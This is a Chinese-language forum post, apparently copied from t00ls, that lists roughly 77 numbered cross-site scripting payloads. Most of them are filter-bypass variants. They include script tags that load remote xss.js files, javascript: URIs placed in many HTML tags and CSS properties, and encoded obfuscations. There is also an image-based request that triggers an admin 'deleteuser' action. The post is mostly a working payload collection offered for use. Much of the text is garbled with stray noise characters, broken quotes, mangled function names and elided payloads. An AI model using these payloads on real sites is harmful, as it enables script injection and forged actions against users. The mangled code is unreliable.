貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
; u7 a1 { \# p(1)普通的XSS JavaScript注入
4 {) b* D3 Z. A$ K<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>9 Z0 V0 v4 p% r. o7 S
(2)IMG标签XSS使用JavaScript命令
: j" ~' x% J- p% X7 v<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
6 J: p4 I, q; m(3)IMG标签无分号无引号; \0 X7 d0 v3 h2 ^4 D9 [, P3 Z
<IMG SRC=javascript:alert(‘XSS’)>
( d4 i+ f" u2 {+ q" |: Q0 b(4)IMG标签大小写不敏感( I9 _( s( X- Q: }) h8 K
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
8 D/ [6 B6 X8 ~/ ]5 k(5)HTML编码(必须有分号)+ |& [; D" }, t, @5 `
<IMG SRC=javascript:alert(“XSS”)>1 ~$ S9 A c( X* h' `
(6)修正缺陷IMG标签
! q+ q( k5 F+ {8 s- y( `<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>! w" {2 l8 S- c" S F# {+ }
' D! u% i1 v, \' ~' V* P4 i
, E+ E; P6 Q7 X4 V8 \$ P
(7)formCharCode标签(计算器)) I4 F% o# i) M
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
* G% k, V+ G$ d A& u(8)UTF-8的Unicode编码(计算器)5 t6 c) ~# K0 P! T( o
<IMG SRC=jav..省略..S')>% @4 o r+ b6 I, S) p7 v8 I
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)% M$ w- ?2 {2 F& Q s, Y
<IMG SRC=jav..省略..S')>4 ]% L" C) `* U" Y- r$ J4 r
(10)十六进制编码也是没有分号(计算器)4 j1 q2 q/ P3 ^3 N9 O; t
<IMG SRC=java..省略..XSS')>
1 q9 Y/ h# x% p' A# P7 A* ]7 X(11)嵌入式标签,将Javascript分开$ V! v9 t6 O& ?% h- A
<IMG SRC=”jav ascript:alert(‘XSS’);”>7 L5 z& Y1 l3 o3 d3 u
(12)嵌入式编码标签,将Javascript分开+ z2 T! Q* j( K( k+ o& g" a Y2 f
<IMG SRC=”jav ascript:alert(‘XSS’);”>
" q) {; Q4 j D' f$ P2 O(13)嵌入式换行符
" _4 g( ]5 j; i) a; k<IMG SRC=”jav ascript:alert(‘XSS’);”>
) O0 d/ X# n* T2 v(14)嵌入式回车
& L$ z4 K2 g( I$ v8 D<IMG SRC=”jav ascript:alert(‘XSS’);”>4 G. x& a% r r3 m1 l3 V
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
# v+ k; e/ x2 f$ K# v<IMG SRC=”javascript:alert(‘XSS‘)”>8 {6 u# v& T: J( B* `- A& E- j
(16)解决限制字符(要求同页面)' N6 N4 W! ^4 v! H) H$ L/ f
<script>z=’document.’</script>
) C( X) [" _- q$ j' Q \( {3 m<script>z=z+’write(“‘</script>
+ F. B& M+ K1 \<script>z=z+’<script’</script>9 B% W5 J9 y! E' l5 R) `
<script>z=z+’ src=ht’</script>, b& ]2 Y- |* {1 J' Y& h! n
<script>z=z+’tp://ww’</script>7 Z* k8 |4 f" g4 q' A; D
<script>z=z+’w.shell’</script>
# e" ~' q9 R4 o2 B, o" Y* T<script>z=z+’.net/1.’</script>
7 Q% R% I) F, X8 j/ I9 k" Z<script>z=z+’js></sc’</script>+ U3 b5 Q2 O8 X' k4 m
<script>z=z+’ript>”)’</script>
! t% m) X. x: S w, A9 N& e<script>eval_r(z)</script>
3 O8 j& r/ p4 Y6 u( S(17)空字符12-7-1 T00LS - Powered by Discuz! Board9 C" n- s; d& A p* D
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
4 @/ K/ i _- f s/ Wperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
8 u, w) F K# f) L) m, {7 y- P(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
0 R+ x' y) i0 M7 ?. kperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out, ]0 ]' ?8 V% m3 D F
(19)Spaces和meta前的IMG标签% ^; F8 A* ~3 i q
<IMG SRC=” javascript:alert(‘XSS’);”>
5 e& A* W6 s* d! O8 v2 X$ G3 @(20)Non-alpha-non-digit XSS
( g. Z6 I! }$ }8 S3 O<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>$ s6 E2 Q' V0 j+ p8 P& p; h
(21)Non-alpha-non-digit XSS to 2. e M0 z9 F) O0 ~; a) p
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>7 X4 U4 N, P8 r5 t" O
(22)Non-alpha-non-digit XSS to 3
" Q* Q1 I" l* w% c w<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
0 U1 C$ T5 V% z" y! H(23)双开括号
# I+ D5 J1 W/ R I0 c5 _# f<<SCRIPT>alert(“XSS”);//<</SCRIPT>
+ O+ S3 S, P' d6 u. K# E(24)无结束脚本标记(仅火狐等浏览器)
4 ^5 y. K) \7 g1 {, _( J/ H<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
@, h3 T2 I1 I, Q(25)无结束脚本标记2
: ?6 t( l7 v& {1 s) }<SCRIPT SRC=//3w.org/XSS/xss.js>
. V O5 x: i' y3 L, l6 ~* g/ A2 P7 z(26)半开的HTML/JavaScript XSS
# [& Z5 b; G6 I2 C3 O<IMG SRC=”javascript:alert(‘XSS’)”+ q. g" Z# Z9 o E. I
(27)双开角括号
6 t( r* N# x4 Z<iframe src=http://3w.org/XSS.html <
, O& n; {1 a; l* o/ e' _5 [6 l(28)无单引号 双引号 分号" n9 m0 ^2 f! e/ Q9 e
<SCRIPT>a=/XSS/
" X& F$ Y& j8 n7 \2 i. Y) palert(a.source)</SCRIPT>
& c6 t |) v& P6 f(29)换码过滤的JavaScript
4 c. q |; Q, Y0 E* @2 |\”;alert(‘XSS’);//
$ ~6 w K0 X. f3 Y9 t! S(30)结束Title标签0 d" W) e1 ~* m6 I( E: n" s, K% L/ [
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
% i1 q t( ]$ A, y5 K(31)Input Image4 l7 B+ }, @2 P& E3 X
<INPUT SRC=”javascript:alert(‘XSS’);”>
9 `% t0 O8 }3 q( J8 l1 V2 H0 G8 X* K" t, C) |(32)BODY Image
6 o3 F3 w( Y; J0 \! P<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
+ z% j. D. Y3 m' e5 z1 O, H(33)BODY标签
5 o- H1 L+ h2 ~# r* p" e/ X1 N<BODY(‘XSS’)>& s3 ?! j2 W* Z( ^% y
(34)IMG Dynsrc- b- m5 B, q m9 K) @$ x% \: v! V/ w* [
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
1 m2 O- s4 R6 {* B(35)IMG Lowsrc1 ?4 f0 p9 `" d3 A; |5 X
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
1 h u/ i; c- P$ F1 j9 ~, W+ L(36)BGSOUND
6 w2 S4 _+ \$ T, _4 K; ]<BGSOUND SRC=”javascript:alert(‘XSS’);”>
- H: E# P7 Z# n5 e0 d(37)STYLE sheet( }0 U$ ~. f, w- Z( A& R, Z0 y; w
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
8 M: b1 [+ ]# u/ L. R8 g2 F(38)远程样式表2 _% N( {$ u( k) y6 O: h) e. `# d: K
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
) o$ x# g/ \+ ] n(39)List-style-image(列表式)5 s' h \+ r9 _
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
, ~/ Q) S& S& i- q- A(40)IMG VBscript! f$ W9 U# E& K: I4 }' R
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS3 R( J7 i& c( g3 O# u# ^9 D8 J
(41)META链接url# Q6 g2 I3 Q" \2 x% Q7 C# E6 T' ]. i
9 O/ i5 M* \+ r6 |$ v b/ O2 W" p" {+ h5 O
<META HTTP-EQUIV=”refresh” CONTENT=”0;
+ c7 y4 K1 Z& E! |URL=http://;URL=javascript:alert(‘XSS’);”>3 v" q4 y8 c! ~3 k4 X
(42)Iframe2 _, ]9 Z( M7 ^
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>8 A5 N1 }6 r& [3 B4 N. E J
(43)Frame. _ U3 B* S1 X, J, r
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board3 Q) Z9 ]& s6 Y# Z/ l7 x6 X# _4 f
https://www.t00ls.net/viewthread ... table&tid=15267 3/6% o- }* ~7 S: D
(44)Table, {! g; ]6 S$ Y' G! @' q& W/ r
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
! P; Q9 N( R- R( ~( e(45)TD% b9 C( T$ I9 `% n2 Z3 n
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
- t; {/ ?; O" _! Y) C(46)DIV background-image
) J) F$ f+ N4 M6 K" Y+ C( H# f<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>! C y; ^. g9 O$ x, v' U
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-/ V: j6 V+ @( r- w0 L$ {; ], X
8&13&12288&65279)3 I8 K* L- P1 h8 G9 m( K
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
8 m. s, f# {: ^% i6 \# r) b(48)DIV expression
) |- _8 D% s: K3 ^" J+ P<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
. x# P& H& |* g" }5 }(49)STYLE属性分拆表达) ]3 x+ ?! E! e) Y% |- X: o7 o/ Y
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
8 v+ e" U' \3 x H( w5 q P(50)匿名STYLE(组成:开角号和一个字母开头)+ O- e1 z9 P0 r- p
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>& S0 ^3 T2 O6 H1 ~/ h, ]: q" S
(51)STYLE background-image/ @1 L" E' X3 G
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A/ c" F J4 N, G! `( x
CLASS=XSS></A>0 g& f4 B* S! C" P
(52)IMG STYLE方式
. ^" P5 t! k) b/ }. r+ Aexppression(alert(“XSS”))’>& }# L% M) p% W- h
(53)STYLE background2 \: m% r; Q5 H$ s8 p# b0 ]) I
<STYLE><STYLE
) h8 L7 K* Q2 M! w- H& j2 p6 @6 H+ @type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
1 P$ r( W! ^3 ?% N" `(54)BASE# A w& B( B& l; R0 u0 A: k9 H
<BASE HREF=”javascript:alert(‘XSS’);//”>+ x8 Y7 G/ {5 T/ O
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
. @ w- C( [! v8 p1 W<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
6 Z; P; W1 q" O/ q(56)在flash中使用ActionScrpt可以混进你XSS的代码
% X6 R! i; @4 w/ D" j% _2 M+ Za=”get”;
2 W$ R# w% b- d, ]1 v& nb=”URL(\”";9 v, J0 M; e4 h9 w( p
c=”javascript:”;
* F: M0 k' ]9 r U+ l, A. c7 J1 Vd=”alert(‘XSS’);\”)”;+ O3 t; Z; R2 m
eval_r(a+b+c+d);
, k9 M9 D |# \6 S; @ P* r(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
% M `% V2 s R) \/ w8 Y9 {3 a<HTML xmlns:xss>
+ x d) _3 D0 P<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
) D l; q0 `" [<xss:xss>XSS</xss:xss>8 a/ w7 ~5 B( e/ f; s
</HTML>' u" x* t; R" _1 }" H7 y
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用/ [0 i! R3 \4 @, B5 i0 f3 U
<SCRIPT SRC=””></SCRIPT>
# t9 L' H% b* ]( L8 n$ \(59)IMG嵌入式命令,可执行任意命令
1 o- `. O8 x( s$ T# t; r9 W<IMG SRC=”http://www.XXX.com/a.php?a=b”>
! J5 @! z5 E4 f(60)IMG嵌入式命令(a.jpg在同服务器). p/ j( O( p2 U0 A
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser, w) |0 ?: s% Z) s* A4 {" \
(61)绕符号过滤# I* @5 a% Z0 l9 [4 F$ z6 G; b2 r
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
$ G0 E$ h: E2 Q" c(62) Q/ y" q% r1 B) l( K
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>4 Z0 s2 w; ~ \) b c
(63)! o3 Q( d0 ?2 x% a; \
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>5 Y5 k n" p1 C6 f/ P I J
(64)
9 |+ n6 @2 u- |0 |4 P<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
0 _, A+ `( A; p2 `) E9 r(65)
* m. B9 E/ F9 h0 k4 z<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>% P ~. R- C) j! p0 _4 N* U
(66)12-7-1 T00LS - Powered by Discuz! Board5 P8 p/ h1 d/ m* b' r# J j1 r
https://www.t00ls.net/viewthread ... table&tid=15267 4/6
0 i& B* J' K% f<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>3 k! C+ l I) _3 _! s, M
(67)
( i) @% |5 X ~+ W$ ]6 F' \<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
+ o2 Z% \7 U4 F* F6 N1 x</SCRIPT>
+ G6 M1 F% P9 S% i j4 V; t(68)URL绕行
6 ?( H9 l+ ?* c& v" X$ @ l<A HREF=”http://127.0.0.1/”>XSS</A>
) B% x8 B/ L" ^$ b8 h; a( M(69)URL编码
# [7 H: ]/ ]4 ~$ E, @<A HREF=”http://3w.org”>XSS</A>
9 G# a+ x2 G* ^% A8 w2 ^' s(70)IP十进制
1 m( @6 `; @# q<A HREF=”http://3232235521″>XSS</A>+ D+ N+ [- V8 g- e" q5 \
(71)IP十六进制4 }8 D2 S' n) F' ?- ?; l
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>* t. q* X1 J0 o e$ f
(72)IP八进制
7 M) ^7 b8 a% i<A HREF=”http://0300.0250.0000.0001″>XSS</A>
4 g! p' h1 U' f1 h(73)混合编码" d3 y( P8 O* C( r1 t
<A HREF=”h
0 @- b' V& q3 ?8 s' Qtt p://6 6.000146.0×7.147/”">XSS</A>
/ q6 p ^9 c: U+ w" V(74)节省[http:]
% t' o1 J/ V% `" z9 f, K6 l<A HREF=”//www.google.com/”>XSS</A>
' f2 D- ]0 v w% e+ u- H! ^(75)节省[www]
0 }& ^, M7 |) }6 c<A HREF=”http://google.com/”>XSS</A>5 T+ B; C$ ^( b: _( G$ K0 B
(76)绝对点绝对DNS
+ D+ R' m9 l/ I9 a& [- }<A HREF=”http://www.google.com./”>XSS</A>
( N; H0 ^4 Y' |( _# K& h9 H @: j. s(77)javascript链接7 o4 M R9 d( A1 \' c. w
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>( ?) a( \& G5 e
E! m7 q- r* b原文地址:http://fuzzexp.org/u/0day/?p=14
& {& P: C6 n% R4 t# X' [9 U1 T. ~
/ {- x* L" b8 H; ]; l& ^ |